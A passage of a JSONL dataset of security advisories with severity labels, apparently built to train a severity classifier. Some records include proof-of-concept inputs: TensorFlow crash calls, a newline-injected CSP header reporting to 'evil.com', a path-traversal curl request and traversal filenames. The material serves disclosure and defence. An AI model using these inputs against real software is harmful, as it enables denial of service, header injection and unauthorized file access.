"train"} -{"id": "4742e70d84d983d7dfa6", "text": "Denial of service in chrono-node\n\nThis affects the package chrono-node before 2.2.4. It hangs on a date-like string with lots of embedded spaces.", "text_raw": "Denial of service in chrono-node\n\n[Severity: HIGH]\n\nThis affects the package chrono-node before 2.2.4. It hangs on a date-like string with lots of embedded spaces.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "16cf901a5a80bd2d4ccf", "text": "Arbitrary File Write via Archive Extraction in unzipper\n\nVersions of `unzipper` before 0.8.13 are vulnerable to arbitrary file write when used to extract a specifically crafted archive that contains path traversal filenames (`../../file.txt` for example).\n\n## Recommendation\n\nUpdate to version 0.3.18 or later.", "text_raw": "Arbitrary File Write via Archive Extraction in unzipper\n\n[Severity: MEDIUM]\n\nVersions of `unzipper` before 0.8.13 are vulnerable to arbitrary file write when used to extract a specifically crafted archive that contains path traversal filenames (`../../file.txt` for example).\n\n\n## Recommendation\n\nUpdate to version 0.3.18 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-07-27", "split": "train"} -{"id": "4030db057ac7d492e8b5", "text": "Cross Site Scripting (XSS) in Quokka\n\nCross Site Scripting (XSS) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the 'Username' parameter in the component 'quokka/admin/actions.py'.", "text_raw": "Cross Site Scripting (XSS) in Quokka\n\n[Severity: MEDIUM]\n\nCross Site Scripting (XSS) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the 'Username' parameter in the component 'quokka/admin/actions.py'.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "b455d398074310a67b20", "text": "Google Chromium V8 Use-After-Free Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium V8 Use-After-Free Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-12-15", "split": "train"} -{"id": "3327e520a4ca980e8bf1", "text": "Malicious Package in koa-body-parse\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "text_raw": "Malicious Package in koa-body-parse\n\n[Severity: CRITICAL]\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "013275863c0a62b74916", "text": "Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities", "text_raw": "Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2019-11-30", "split": "train"} -{"id": "fb994bc2e2f7f27cdc46", "text": "Malicious Package in bs58chekc\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bs58chekc\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "ecd894040c4bcfc3333e", "text": "Stored XSS in Apache Airflow\n\nAn issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the the \"classic\" UI.", "text_raw": "Stored XSS in Apache Airflow\n\n[Severity: MEDIUM]\n\nAn issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the the \"classic\" UI.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-07-27", "split": "train"} -{"id": "3051a98c73a9f8ea6171", "text": "KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)", "text_raw": "KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2021-03-18", "split": "train"} -{"id": "393481fd073618b9d107", "text": "Division by 0 in `QuantizedMul`\n\n### Impact\nAn attacker can trigger a division by 0 in `tf.raw_ops.QuantizedMul`:\n\n```python\nimport tensorflow as tf\n\nx = tf.zeros([4, 1], dtype=tf.quint8)\ny = tf.constant([], dtype=tf.quint8)\nmin_x = tf.constant(0.0)\nmax_x = tf.constant(0.0010000000474974513)\nmin_y = tf.constant(0.0)\nmax_y = tf.constant(0.0010000000474974513)\n\ntf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55900e961ed4a23b438392024912154a2c2f5e85/tensorflow/core/kernels/quantized_mul_op.cc#L188-L198) does a division by a quantity that is controlled by the caller:\n\n```cc\ntemplate \nvoid VectorTensorMultiply(const T* vector_data, int32 vector_offset,\n int64 vector_num_elements, const T* tensor_data,\n int32 tensor_offset, int64 tensor_num_elements,\n Toutput* output) {\n for (int i = 0; i < tensor_num_elements; ++i) {\n const int64 vector_i = i % vector_num_elements;\n ...\n }\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6](https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "text_raw": "Division by 0 in `QuantizedMul`\n\n[Severity: LOW]\n\n### Impact\nAn attacker can trigger a division by 0 in `tf.raw_ops.QuantizedMul`:\n\n```python\nimport tensorflow as tf\n\nx = tf.zeros([4, 1], dtype=tf.quint8)\ny = tf.constant([], dtype=tf.quint8)\nmin_x = tf.constant(0.0)\nmax_x = tf.constant(0.0010000000474974513)\nmin_y = tf.constant(0.0)\nmax_y = tf.constant(0.0010000000474974513)\n\ntf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)\n``` \n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55900e961ed4a23b438392024912154a2c2f5e85/tensorflow/core/kernels/quantized_mul_op.cc#L188-L198) does a division by a quantity that is controlled by the caller:\n\n```cc\ntemplate \nvoid VectorTensorMultiply(const T* vector_data, int32 vector_offset,\n int64 vector_num_elements, const T* tensor_data,\n int32 tensor_offset, int64 tensor_num_elements,\n Toutput* output) {\n for (int i = 0; i < tensor_num_elements; ++i) {\n const int64 vector_i = i % vector_num_elements;\n ...\n }\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6](https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "7ff7a23981c57683b014", "text": "Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading", "text_raw": "Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2011-04-03", "split": "train"} -{"id": "0d1096b2a8d79e62efa6", "text": "Division by 0 in most convolution operators\n\n### Impact\nMost implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash:\n\n```python\nimport tensorflow as tf\n\ntf.compat.v1.disable_v2_behavior()\ntf.raw_ops.Conv2D(\n input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32),\n filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32),\n strides = [1, 1, 1, 1],\n padding = \"SAME\")\n```\n\nThe shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/framework/common_shape_fns.cc#L577) is missing several validations before doing divisions and modulo operations.\n\n### Patches\nWe have patched the issue in GitHub commit [8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4](https://github.com/tensorflow/tensorflow/commit/8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "text_raw": "Division by 0 in most convolution operators\n\n[Severity: MEDIUM]\n\n### Impact\nMost implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash:\n\n```python\nimport tensorflow as tf\n\ntf.compat.v1.disable_v2_behavior()\ntf.raw_ops.Conv2D(\n input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32),\n filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32),\n strides = [1, 1, 1, 1],\n padding = \"SAME\")\n```\n\nThe shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/framework/common_shape_fns.cc#L577) is missing several validations before doing divisions and modulo operations.\n\n### Patches\nWe have patched the issue in GitHub commit [8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4](https://github.com/tensorflow/tensorflow/commit/8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "39ad2b1a5687834f0859", "text": "Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC", "text_raw": "Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2008-11-24", "split": "train"} -{"id": "b645fcf1ebb52831983c", "text": "Limited header injection when using dynamic overrides with user input in RubyGems secure_headers\n\n### Impact\n\nIf user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.\n\nUpon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.\n\ne.g.\n\n```ruby\noverride_content_security_directives(script_src: ['mycdn.com', \"\\ninjected\\n\"])` \n```\n\nwould result in\n\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: injected\nContent-Security-Policy: rest-of-the-header\n```\n\nCSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:\n\n```ruby\noverride_content_security_directives(script_src: [\"mycdn.com\", \"\\ndefault-src 'none'; report-uri evil.com\"]) \n```\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: default-src 'none'; report-uri evil.com\nContent-Security-Policy: rest-of-the-header\n```\n\n### Patches\n\nThis has been fixed in 6.3.0, 5.2.0, and 3.9.0\n\n### Workarounds\n\n```ruby\noverride_content_security_policy_directives(:frame_src, [user_input.gsub(\"\\n\", \" \")])\n```\n\n### References\n\nhttps://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c\n[The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)\n* DM us at @ndm on twitter", "text_raw": "Limited header injection when using dynamic overrides with user input in RubyGems secure_headers\n\n[Severity: MEDIUM]\n\n### Impact\n\nIf user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.\n\nUpon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.\n\ne.g.\n\n```ruby\noverride_content_security_directives(script_src: ['mycdn.com', \"\\ninjected\\n\"])` \n```\n\nwould result in \n\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: injected\nContent-Security-Policy: rest-of-the-header\n```\n\nCSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:\n\n```ruby\noverride_content_security_directives(script_src: [\"mycdn.com\", \"\\ndefault-src 'none'; report-uri evil.com\"]) \n```\n```\nContent-Security-Policy: ... script-src: mycdn.com\nContent-Security-Policy: default-src 'none'; report-uri evil.com\nContent-Security-Policy: rest-of-the-header\n```\n\n### Patches\n\nThis has been fixed in 6.3.0, 5.2.0, and 3.9.0\n\n### Workarounds\n\n```ruby\noverride_content_security_policy_directives(:frame_src, [user_input.gsub(\"\\n\", \" \")])\n```\n\n### References\n\nhttps://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c\n[The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)\n* DM us at @ndm on twitter", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-23", "split": "train"} -{"id": "02d35f0e18d86c770367", "text": "Argo Server TLS requests could be forged by attacker with network access\n\n### Impact\n\nWe are not aware of any exploits. This is a pro-active fix.\n\nImpacted:\n\n* You are running Argo Server < v3.0 with `--secure=true` or >= v3.0 with `--secure` unspecified (note - running in secure mode is recommended regardless).\n* The attacker is within your network. If you expose Argo Server to the Internet then \"your network\" is \"the Internet\".\n\nThe Argo Server's keys are packaged within the image. They could be extracted and used to decrypt traffic, or forge requests.\n\n### Patches\n\nhttps://github.com/argoproj/argo-workflows/pull/6540\n\n### Workarounds\n\n* Make sure that your Argo Server service or pod are not directly accessible outside of your cluster. Put TLS load balancer in front of it.\n\nThis was identified by engineers at Jetstack.io", "text_raw": "Argo Server TLS requests could be forged by attacker with network access\n\n[Severity: MEDIUM]\n\n### Impact\n\nWe are not aware of any exploits. This is a pro-active fix.\n\nImpacted: \n\n* You are running Argo Server < v3.0 with `--secure=true` or >= v3.0 with `--secure` unspecified (note - running in secure mode is recommended regardless).\n* The attacker is within your network. If you expose Argo Server to the Internet then \"your network\" is \"the Internet\". \n\nThe Argo Server's keys are packaged within the image. They could be extracted and used to decrypt traffic, or forge requests.\n\n### Patches\n\nhttps://github.com/argoproj/argo-workflows/pull/6540\n\n### Workarounds\n\n* Make sure that your Argo Server service or pod are not directly accessible outside of your cluster. Put TLS load balancer in front of it.\n\nThis was identified by engineers at Jetstack.io", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "5d06fb6fd2804596fae5", "text": "Server-Side Request Forgery in node-pdf-generator\n\nThis affects all versions of package node-pdf-generator up to and including 0.0.6. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.", "text_raw": "Server-Side Request Forgery in node-pdf-generator\n\n[Severity: HIGH]\n\nThis affects all versions of package node-pdf-generator up to and including 0.0.6. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "d18e0006ab43855b6818", "text": "AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit", "text_raw": "AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2019-12-27", "split": "train"} -{"id": "0f504886784d36706f22", "text": "Uncontrolled Resource Consumption in XNIO\n\nA vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.", "text_raw": "Uncontrolled Resource Consumption in XNIO\n\n[Severity: MEDIUM]\n\nA vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "67884dfc96ac99638e46", "text": "Remote Code Execution (RCE) Exploit on Cross Site Scripting (XSS) Vulnerability\n\n### Impact\nA RCE exploit has been discovered in the Red Discord Bot - Dashboard Webserver: this exploit allows Discord users with specially crafted Server names and Usernames/Nicknames to inject code into the webserver front-end code. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information.\n\n### Workarounds\nThere are no workarounds, bot owners must upgrade their relevant packages (Dashboard module and Dashboard webserver) in order to patch this issue\n\n### References\n- 99d88b8\n- a6b9785\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Cog-Creators/Red-Dashboard](https://github.com/Cog-Creators/Red-Dashboard/issues/new/choose)\n* Over on the official [Red Server](https://discord.gg/red) or at the Third Party Server [Toxic Layer](https://discord.gg/vQZTdB9)", "text_raw": "Remote Code Execution (RCE) Exploit on Cross Site Scripting (XSS) Vulnerability\n\n[Severity: MEDIUM]\n\n### Impact\nA RCE exploit has been discovered in the Red Discord Bot - Dashboard Webserver: this exploit allows Discord users with specially crafted Server names and Usernames/Nicknames to inject code into the webserver front-end code. By abusing this exploit, it's possible to perform destructive actions and/or access sensitive information.\n\n### Patches\nThis high severity exploit has been fixed on version `0.1.7a`.\n\n### Workarounds\nThere are no workarounds, bot owners must upgrade their relevant packages (Dashboard module and Dashboard webserver) in order to patch this issue\n\n### References\n- 99d88b8\n- a6b9785\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Cog-Creators/Red-Dashboard](https://github.com/Cog-Creators/Red-Dashboard/issues/new/choose)\n* Over on the official [Red Server](https://discord.gg/red) or at the Third Party Server [Toxic Layer](https://discord.gg/vQZTdB9)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-12-08", "split": "train"} -{"id": "c94d29f1045cabb4f1ba", "text": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in micronaut-core\n\nWith a basic configuration like\n\n```yaml\nrouter:\n static-resources:\n assets:\n enabled: true\n mapping: /.assets/public/**\n paths: file:/home/lstrmiska/test/\n```\n\nit is possible to access any file from a filesystem, using \"/../../\" in URL, as Micronaut does not restrict file access to configured paths.\n\n**Repro Steps**\n- create a file test.txt in /home/lstrmiska\n- start micronaut\n- execute command\n`curl -v --path-as-is \"http://localhost:8080/.assets/public/../test.txt\"`\n\n### Impact\n\nMicronaut can potentially leak sensitive information.\n\nSee https://cwe.mitre.org/data/definitions/22.html\n\n### Patches\n\n```\ndiff --git a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\nindex 2f5a91403..19d3b7f05 100644\n--- a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\n+++ b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\n@@ -69,6 +69,9 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n @Override\n public Optional getResourceAsStream(String path) {\n Path filePath = getFilePath(normalize(path));\n+ if (pathOutsideBase(filePath)) {\n+ return Optional.empty();\n+ }\n try {\n return Optional.of(Files.newInputStream(filePath));\n } catch (IOException e) {\n@@ -79,7 +82,7 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n @Override\n public Optional getResource(String path) {\n Path filePath = getFilePath(normalize(path));\n- if (Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {\n+ if (!pathOutsideBase(filePath) && Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {\n try {\n URL url = filePath.toUri().toURL();\n return Optional.of(url);\n@@ -117,4 +120,15 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n private Path getFilePath(String path) {\n return baseDirPath.map(dir -> dir.resolve(path)).orElseGet(() -> Paths.get(path));\n }\n+\n+ private boolean pathOutsideBase(Path path) {\n+ if (baseDirPath.isPresent()) {\n+ Path baseDir = baseDirPath.get();\n+ if (path.isAbsolute() == baseDir.isAbsolute()) {\n+ Path relativePath = baseDir.relativize(path);\n+ return relativePath.startsWith(\"..\");\n+ }\n+ }\n+ return false;\n+ }\n }\n--\n\n```\n\n### Workarounds\n\n- do not use ** in mapping, use only * which exposes only flat structure of a directory not allowing traversal\n- run micronaut in chroot (linux only)\n\n### References\n\nSee https://cwe.mitre.org/data/definitions/22.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Github](https://github.com/micronaut-projects/micronaut-core/issues)\n* Email us at [info@micronaut.io](mailto:info@micronaut.io)", "text_raw": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in micronaut-core\n\n[Severity: HIGH]\n\nWith a basic configuration like\n\n```yaml\nrouter:\n static-resources:\n assets:\n enabled: true\n mapping: /.assets/public/**\n paths: file:/home/lstrmiska/test/\n```\n\nit is possible to access any file from a filesystem, using \"/../../\" in URL, as Micronaut does not restrict file access to configured paths. \n\n**Repro Steps**\n- create a file test.txt in /home/lstrmiska\n- start micronaut\n- execute command\n`curl -v --path-as-is \"http://localhost:8080/.assets/public/../test.txt\"`\n\n\n### Impact\n\nMicronaut can potentially leak sensitive information.\n\nSee https://cwe.mitre.org/data/definitions/22.html\n\n### Patches\n\n```\ndiff --git a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\nindex 2f5a91403..19d3b7f05 100644\n--- a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\n+++ b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java\n@@ -69,6 +69,9 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n @Override\n public Optional getResourceAsStream(String path) {\n Path filePath = getFilePath(normalize(path));\n+ if (pathOutsideBase(filePath)) {\n+ return Optional.empty();\n+ }\n try {\n return Optional.of(Files.newInputStream(filePath));\n } catch (IOException e) {\n@@ -79,7 +82,7 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n @Override\n public Optional getResource(String path) {\n Path filePath = getFilePath(normalize(path));\n- if (Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {\n+ if (!pathOutsideBase(filePath) && Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) {\n try {\n URL url = filePath.toUri().toURL();\n return Optional.of(url);\n@@ -117,4 +120,15 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader\n private Path getFilePath(String path) {\n return baseDirPath.map(dir -> dir.resolve(path)).orElseGet(() -> Paths.get(path));\n }\n+\n+ private boolean pathOutsideBase(Path path) {\n+ if (baseDirPath.isPresent()) {\n+ Path baseDir = baseDirPath.get();\n+ if (path.isAbsolute() == baseDir.isAbsolute()) {\n+ Path relativePath = baseDir.relativize(path);\n+ return relativePath.startsWith(\"..\");\n+ }\n+ }\n+ return false;\n+ }\n }\n-- \n\n```\n\n### Workarounds\n\n- do not use ** in mapping, use only * which exposes only flat structure of a directory not allowing traversal\n- run micronaut in chroot (linux only)\n\n### References\n\nSee https://cwe.mitre.org/data/definitions/22.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Github](https://github.com/micronaut-projects/micronaut-core/issues)\n* Email us at [info@micronaut.io](mailto:info@micronaut.io)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-07-26", "split": "train"} -{"id": "554b7067bf1bebb3f64b", "text": "Privilege Escalation in cordova-plugin-inappbrowser\n\nVersions of `cordova-plugin-inappbrowser` prior to 3.1.0 are vulnerable to Privilege Escalation. A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. This affects Cordova Android applications using the package.\n\n## Recommendation\n\nUpgrade to version 3.1.0 or later.", "text_raw": "Privilege Escalation in cordova-plugin-inappbrowser\n\n[Severity: CRITICAL]\n\nVersions of `cordova-plugin-inappbrowser` prior to 3.1.0 are vulnerable to Privilege Escalation. A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. This affects Cordova Android applications using the package.\n\n\n## Recommendation\n\nUpgrade to version 3.1.0 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "570960653c4e0ea96e3f", "text": "Unauthorized File Access in harp\n\nAffected versions of `harp` are vulnerable to Unauthorized File Access. The package states that it ignores files and directories with names that start with an underscore, such as `_secret-folder`. If the underscore character is URL encoded the server delivers the file.\n\n## Recommendation\n\nUpgrade to version `0.40.2` or later.", "text_raw": "Unauthorized File Access in harp\n\n[Severity: MEDIUM]\n\nAffected versions of `harp` are vulnerable to Unauthorized File Access. The package states that it ignores files and directories with names that start with an underscore, such as `_secret-folder`. If the underscore character is URL encoded the server delivers the file.\n\n## Recommendation\n\nUpgrade to version `0.40.2` or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-13", "split": "train"} -{"id": "d9d2828bd0cc8990dd41", "text": "Creme Fraiche contains OS Command Injection\n\nThe set_meta_data function in lib/cremefraiche.rb in the Creme Fraiche gem before 0.6.1 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in the file name of an email attachment. NOTE: some of these details are obtained from third party information.", "text_raw": "Creme Fraiche contains OS Command Injection\n\n[Severity: CRITICAL]\n\nThe set_meta_data function in lib/cremefraiche.rb in the Creme Fraiche gem before 0.6.1 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in the file name of an email attachment. NOTE: some of these details are obtained from third party information.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "aea2c1e90c2d86d35fa8", "text": "Textpattern 4.2.0 (txplib_db) Null Termination Cross-Site Scripting Vulnerability", "text_raw": "Textpattern 4.2.0 (txplib_db) Null Termination Cross-Site Scripting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2010-09-08", "split": "train"} -{"id": "4b3311d546666ea55e74", "text": "Data races in lexer\n\nlexer is a plugin based lexical reader.Affected versions of this crate implements Sync for ReaderResult with the trait bound T: Send, E: Send. Since matching on the public enum ReaderResult provides access to &T & &E, allowing data race to a non-Sync type T or E. This can result in a memory corruption when multiple threads concurrently access &T or &E. Suggested fix for the bug is change the trait bounds imposed on T & E to be T: Sync, E: Sync.", "text_raw": "Data races in lexer\n\n[Severity: HIGH]\n\nlexer is a plugin based lexical reader.Affected versions of this crate implements Sync for ReaderResult with the trait bound T: Send, E: Send. Since matching on the public enum ReaderResult provides access to &T & &E, allowing data race to a non-Sync type T or E. This can result in a memory corruption when multiple threads concurrently access &T or &E. Suggested fix for the bug is change the trait bounds imposed on T & E to be T: Sync, E: Sync.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "c96becfc67c52feff3cc", "text": "Path traversal in 